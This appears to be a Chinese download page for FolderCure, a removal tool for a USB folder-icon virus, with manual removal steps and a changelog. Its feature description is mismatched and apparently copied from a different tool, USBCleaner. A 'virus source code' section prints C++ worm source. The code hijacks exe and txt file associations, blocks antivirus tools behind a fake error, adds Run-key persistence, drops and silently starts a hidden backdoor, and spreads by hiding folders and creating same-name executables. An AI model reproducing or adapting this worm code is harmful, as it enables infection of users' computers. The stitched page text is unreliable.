分类

foldercure文件夹图标病毒专杀工具下载 V2.4 官方版

foldercure文件夹图标病毒专杀工具下载 V2.4 官方版 xx

大小:650KB更新日期:2025/12/25

类别:系统软件语言:简体中文

已下架
    foldercure文件夹图标病毒专杀工具专门查杀电脑硬盘或者U盘中自动生成同名的文件病毒,并且可以根据实际情况清理磁盘文件或者隐藏文件夹,同时要能够修复系统磁盘以及文件。

    foldercure文件夹图标病毒专杀工具

    【软件介绍】

    foldercure图标文件夹专杀工具主用于清理在盘里或者U盘名自动产生同名的EXE文件,这种病毒在几年前较为常见,现在应该见的不多了,有碰到此问题的不要错过。

    foldercure文件夹图标病毒专杀工具

    【软件功能】

    u盘病毒专杀工具usbcleaner是一种纯绿色的辅助杀毒工具,具有检测查杀70余种U盘病毒,U盘病毒广谱扫描,U盘病毒免疫,修复显示隐藏文件及系统文件,安全卸载移动盘盘符等功能,全方位一 体化修复杀除U盘病毒.同时u盘病毒专杀工具usbcleanerr能迅速对新出现的U盘病毒进行处理.u盘病毒专杀工具usbcleaner是你学习,工作,娱乐的好帮手。

    【使用方法】

    1、软件下载解压完成后,点击FolderCure打开软件,打开完成后,点击开始扫描即可开始扫描病毒。

    2、选择扫描方式:全盘扫描、u盘扫描和自定路径扫描;

    3、扫描修复完成。

    【查杀方式】

    1.下载usbcleaner,并运行其中的foldercure.exe
    2.下载usbcleaner单独的文件夹图标病毒专杀工具,下
    3.手动查杀:
    结束进程
    XP-8B618895.EXE(注意名称不固定,最好用icesword,其图标是文件夹容易区分)
    依次删除
    C:\WINDOWS\system32\ul.dll 2,404
    C:\WINDOWS\system32\og.dll 692
    C:\WINDOWS\system32\com.run 270,336
    C:\Documents and Settings\Nick\「开始」菜单\程序\启动\ .lnk 指向C:\WINDOWS\system32\XP-8B618895.EXE(注意空格)
    C:\WINDOWS\system32\og.EDT&一个VB程序那种图标的exe(名字记不清了,总之看修改日期就好几乎与其他可疑文件是同一时期而且这几个文件都在一块呢)
    (以上两个原文里虽然没提但还是也一并删除吧,再啰嗦一句,当然XP-*.exe这些看见也一概删除)
    (删除下面几个是关键哦,网上一般解决办法都没提)
    以下是易语言的库文件等:
    C:\WINDOWS\system32\dp1.fne
    C:\WINDOWS\system32\eAPI.fne
    C:\WINDOWS\system32\internet.fne
    C:\WINDOWS\system32\krnln.fnr
    C:\WINDOWS\system32\RegEx.fnr
    C:\WINDOWS\system32\shell.fne
    C:\WINDOWS\system32\spec.fne
    删除病毒启动项
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    XP-8B618895(此处根据病毒名称而定)
    手动删除U盘根目录的文件夹图标同名EXE文件

    【病毒源代码】

    bool CVirousApp::OpenFuckFile()
    {
    char CmdLine[MAX_PATH]={0};
    char DirUrl[MAX_PATH]={0};
    char HiJack[MAX_PATH]={0};
    if(!GetCurrentDirectory(MAX_PATH,DirUrl))
    return FALSE;
    char ch='\\';
    if(ch!=*(DirUrl strlen(DirUrl)-1))
    {
    strcat(DirUrl,"\\");
    }
    //此处只在系统根目录下有效
    sprintf(HiJack,"%s%s\\",DirUrl,AfxGetApp()->m_pszAp pName);
    //判断是否存在。
    可以打开
    if(-1==_access(HiJack,0))
    return FALSE;
    else
    {
    sprintf(CmdLine,"explorer.exe %s",HiJack);
    // MessageBox(CmdLine); //For a Test
    if(WinExec(CmdLine,SW_SHOW)<31)
    return FALSE;
    }
    return TRUE;
    }
    2、劫持"txt、exe"文件,并屏蔽常用安全工具
    //定义特征字符串
    BOOL check=TRUE;
    int len=7;
    char *FuckExe[]={"USBCleaner",
    "Kis",
    "Kav",
    "IceSword",
    "Kill",
    "WSYSCHECK",
    "360"};
    //获取参数并判断
    if(strcmp(m_lpCmdLine,""))//如果有参数
    {
    //判断特征字符串
    int i;
    for(i=0;i<len;i )
    {
    if(strstr(_strupr(_strdup(m_lpCmdLine)),
    _strupr(_strdup(FuckExe))))
    { check=FALSE; break;}
    }
    // LPTSTR ext;
    // ext=wcschr(m_lpCmdLine,_T(".")) 1;
    CString cmd;
    // if(!wcscmp(ext,_T("txt")))
    if(strstr(m_lpCmdLine,_T(".txt"))||strstr(m_lpCmdL ine,_T(".TXT")))
    {
    cmd.Format("%s %s","notepad.exe",m_lpCmdLine);
    }
    else
    if(strstr(m_lpCmdLine,_T(".exe"))||strstr(m_lpCmdL ine,_T(".EXE")))
    {
    //此处不完美。
    判断文件名
    if(!check)
    {
    // AfxMessageBox("文件已损坏!");
    ::MessageBox(NULL,"文件已损坏!请重新安装应用程序!","Microsoft",MB_OK);
    return FALSE;
    }
    else
    cmd.Format("%s",m_lpCmdLine);
    }
    WinExec(cmd,SW_NORMAL);
    }
    else
    //打开文件
    OpenFuckFile();
    3、自启动及实现劫持"exe、txt"文件
    //向系统目录下拷贝程序
    char FileSource[MAX_PATH]={0};
    char FileNew[MAX_PATH]={0};
    HMODULE hModule;
    hModule=GetModuleHandle(NULL);
    GetModuleFileName(hModule,FileSource,MAX_PATH);
    CloseHandle(hModule);
    GetSystemDirectory(FileNew,MAX_PATH);
    strcat(FileNew,"\\SysKernel.exe");
    CopyFile(FileSource,FileNew,TRUE);
    SetFileAttributes(FileNew, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
    //写注册表。
    弄个自启动
    WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run",
    "SysKernel",REG_SZ,FileNew,0,0);
    //写注册表,进行映像劫持
    char Hijack[MAX_PATH]={0};
    sprintf(Hijack,"%s %%1",FileNew);
    WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Classes\\ txtfile\\shell\\open\\command",
    NULL,REG_SZ,Hijack,0,1);
    WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Classes\\ exefile\\shell\\open\\command",
    NULL,REG_SZ,Hijack,0,1);
    4、释放后门,并启动之
    BOOL CVirousDlg::ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)
    {
    HGLOBAL hRes;
    HRSRC hResInfo;
    HANDLE hFile;
    DWORD dwBytes;
    hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);
    if (hResInfo == NULL)
    return FALSE;
    hRes = LoadResource(NULL, hResInfo);
    if (hRes == NULL)
    return FALSE;
    hFile = CreateFile
    (
    lpFileName,
    GENERIC_WRITE,
    FILE_SHARE_WRITE,
    NULL,
    CREATE_ALWAYS,
    FILE_ATTRIBUTE_NORMAL,
    NULL
    );
    if (hFile == NULL)
    return FALSE;
    WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);
    CloseHandle(hFile);
    return TRUE;
    }
    VOID CVirousDlg::ReleaseDoor()
    {
    char strSystemPath[MAX_PATH];
    GetSystemDirectory(strSystemPath, sizeof(strSystemPath));
    lstrcat(strSystemPath, "\\SysService.exe");
    ReleaseResource(IDR_BIN, "BIN", strSystemPath);
    SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
    //实现后门自启动
    WriteRegEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft \\Windows\\CurrentVersion\\Run",
    "SysService",REG_SZ,strSystemPath,0,0);
    WinExec(strSystemPath,SW_HIDE);
    }
    5、遍历磁盘并拷贝自身
    //遍历系统磁盘
    BOOL CVirousDlg::FuckFile()
    {
    DWORD dwNumBytesForDriveStrings;//实际存储驱动器号的字符串长度
    LPSTR lp;
    CString strLogdrive;
    //获得实际存储驱动器号的字符串长度
    dwNumBytesForDriveStrings=GetLogicalDriveStrings(0 ,NULL);//*sizeof(TCHAR);
    //如果字符串不为空。
    则表示有正常的驱动器存在
    if (dwNumBytesForDriveStrings!=0)
    {
    lp=new char[dwNumBytesForDriveStrings];
    GetLogicalDriveStrings(dwNumBytesForDriveStrings,l p);
    while (*lp!=0)
    {
    DoBad(lp);
    lp=strchr(lp,0) 1;
    }
    return TRUE;
    }
    else
    return FALSE;
    }
    //干坏事
    VOID CVirousDlg::DoBad(char DriveBuf[])
    {
    CFileFind finder;
    // build a string with wildcards
    CString strWildcard(DriveBuf);
    strWildcard = _T("*.*");
    char FileSource[MAX_PATH]={0};
    char FileNew[MAX_PATH]={0};
    HMODULE hModule;
    hModule=GetModuleHandle(NULL);
    GetModuleFileName(hModule,FileSource,MAX_PATH);
    // CloseHandle(hModule);
    // start working for files
    BOOL bWorking = finder.FindFile(strWildcard);
    while (bWorking)
    {
    // nReg ;
    bWorking = finder.FindNextFile();
    // skip . and .. files; otherwise, we'd
    // recur infinitely!
    if (finder.IsDots())
    continue;
    // if it's a directory, recursively search it
    if (finder.IsDirectory()&&!finder.IsSystem()&&!finder .IsHidden())
    {
    nReg ;
    if(!SetFileAttributes(finder.GetFilePath(),
    FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))
    continue;
    sprintf(FileNew,"%s%s",finder.GetFilePath(),".exe" );
    CopyFile(FileSource,FileNew,TRUE);
    if(FUCKREG==nReg)
    {
    WriteReg(FileNew);
    }
    }
    }
    finder.Close();
    }

    【软件特点】


    【使用方法】


    【更新日志】


    【更新日志】

    1. 对FolderCure报告Folder_ForceHidden作非病毒标注。
    2. 对FolderCure部分界面进行美化调整。
    3. 修正USBCleaner对正常vmnat.exe的错误警报问题。
    4. 对USBCleaner更新模块Update.exe进行改进,以后在USBCleaner没有更新的时候,可通过在线升级获取FolderCure的全部更新文件。
    5. 更新FolderCure到V4.4。
    6. 修正USBMON在繁体中文系统中重复运行提示文字的乱码问题。
    7. 修正USBCleaner主程式一处在繁体中文系统中乱码问题。
    8. 强对gdiplus.exe usddriver.exe等回收站图标病毒的查杀(可通过FolderCure查杀)。
    9. 对FolderCure病毒库重新进行优化(注意这将使旧版本的FolderCure无法正确读取新版病毒库,请下载最新版)。
    10. 增强对文件夹图标病毒Important.FILES.EXE系列的识别与查杀。
    11. 对FolderCure更新模块进行调整与优化。
    12. 新增240个新U盘类病毒的查杀,其中包括delautorun.bat Worm.Win32.Autorun.204800;.exe Trojan.Win32.DownldrU.a;useinit.exe Worm.Win32.Autorun.jot;h4ck3v1l.vbs Worm.Script.VBS.Autorun;cao.exe Trojan.Win32.Nodef.ihw;boot.exe Trojan.Win32.Undef.dqr等等。

    显示全部

    网友评论
    我要跟贴
    精品推荐

    猜你喜欢

    • 沙威玛传奇
    • 真人互动剧情类手游
    • 最真实的警察模拟类游戏
    • 中式风格恐怖游戏
    • 末日生存打僵尸游戏

    沙威玛传奇

    沙威玛传奇是款很受玩家欢迎的手机游戏,这款游戏中有超多不同国家的美食食谱,您可以感受到土耳其的风土人情,还能用美食征服全世界的顾客!喜欢美食经营及美食制作的顾客千万不能错过。

    相关下载

    0